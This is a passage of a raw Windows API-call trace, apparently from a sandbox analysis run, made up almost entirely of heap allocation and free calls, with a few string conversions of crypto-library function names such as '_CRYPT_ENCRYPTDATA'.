(HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0077.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0077.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb4c8 [0077.347] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e318 | out: hHeap=0x650000) returned 1 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e708 | out: hHeap=0x650000) returned 1 [0077.347] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc20 | out: hHeap=0x650000) returned 1 [0077.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.348] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb468 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9708 [0077.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9708 | out: hHeap=0x650000) returned 1 [0077.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0077.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5b8 | out: hHeap=0x650000) returned 1 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8b78 [0077.348] PeekMessageW (in: lpMsg=0x61ee24, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61ee24) returned 0 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb468 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0077.348] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0077.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0077.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb468 | out: hHeap=0x650000) returned 1 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc20 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb468 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68da90 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e708 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0077.348] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e318 [0077.348] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb4c8 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76dfe8 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb408 [0077.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb408 | out: hHeap=0x650000) returned 1 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb408 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3d8 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3f8 [0077.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3f8 | out: hHeap=0x650000) returned 1 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb3f8 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e360 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb448 [0077.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb448 | out: hHeap=0x650000) returned 1 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76e468 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68def0 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e240 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb448 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afd0 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d9f0 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0077.349] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5f8 [0077.349] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1f8 | out: hHeap=0x650000) returned 1 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e058 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1f8 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68ddd8 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b270 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd88 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e120 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4f8 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e690 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b5d0 [0077.350] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0077.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0077.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb518 | out: hHeap=0x650000) returned 1 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bb8 [0077.350] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68d928 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0077.350] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0077.350] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e198 | out: hHeap=0x650000) returned 1 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd38 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e198 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb418 [0077.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e3f0 | out: hHeap=0x650000) returned 1 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5a8 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0077.351] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0077.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b588 | out: hHeap=0x650000) returned 1 [0077.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5a8 | out: hHeap=0x650000) returned 1 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df18 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x1) returned 0x6bb5a8 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd10 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e3f0 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0077.351] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4d8 | out: hHeap=0x650000) returned 1 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76b1c8 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68e030 [0077.351] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0077.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e0c0 | out: hHeap=0x650000) returned 1 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dfe0 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e0c0 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b588 [0077.352] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dd60 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb558 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.352] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0077.352] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4b8 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0077.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9708 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0077.353] CharLowerBuffW (in: lpsz="uint;dword", cchLength=0xa | out: lpsz="uint;dword") returned 0xa [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f100 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e030 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0077.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0077.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0077.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0077.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0077.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0077.353] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb498 | out: hHeap=0x650000) returned 1 [0077.353] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb498 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb568 [0077.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0077.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0077.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0077.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0077.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0077.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.354] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb598 [0077.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.354] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.354] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e138 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1c8 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6a8 | out: hHeap=0x650000) returned 1 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc98 | out: hHeap=0x650000) returned 1 [0077.355] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc98 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6a8 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4b8 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1c8 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb598 [0077.355] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4b0 | out: hHeap=0x650000) returned 1 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4b0 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb528 [0077.355] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0077.356] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0077.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x692e90 | out: hHeap=0x650000) returned 1 [0077.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0xc) returned 0x76afe8 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0077.356] PeekMessageW (in: lpMsg=0x61dd8c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61dd8c) returned 0 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb588 [0077.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0077.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0077.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76afe8 | out: hHeap=0x650000) returned 1 [0077.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76afe8 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e138 [0077.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ada8 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0077.356] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e420 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.356] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e300 [0077.357] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e2e8 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.357] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4e0 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df88 [0077.357] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e558 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.357] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df28 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0077.357] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x40) returned 0x74b780 [0077.357] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e588 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de00 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f96a8 [0077.357] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76aee0 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb588 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e108 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5e8 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb528 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb528 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e108 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5e8 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76aee0 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb588 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96a8 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e438 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6c0 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68de00 | out: hHeap=0x650000) returned 1 [0077.358] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6c0 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0077.358] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e438 [0077.358] HeapFree 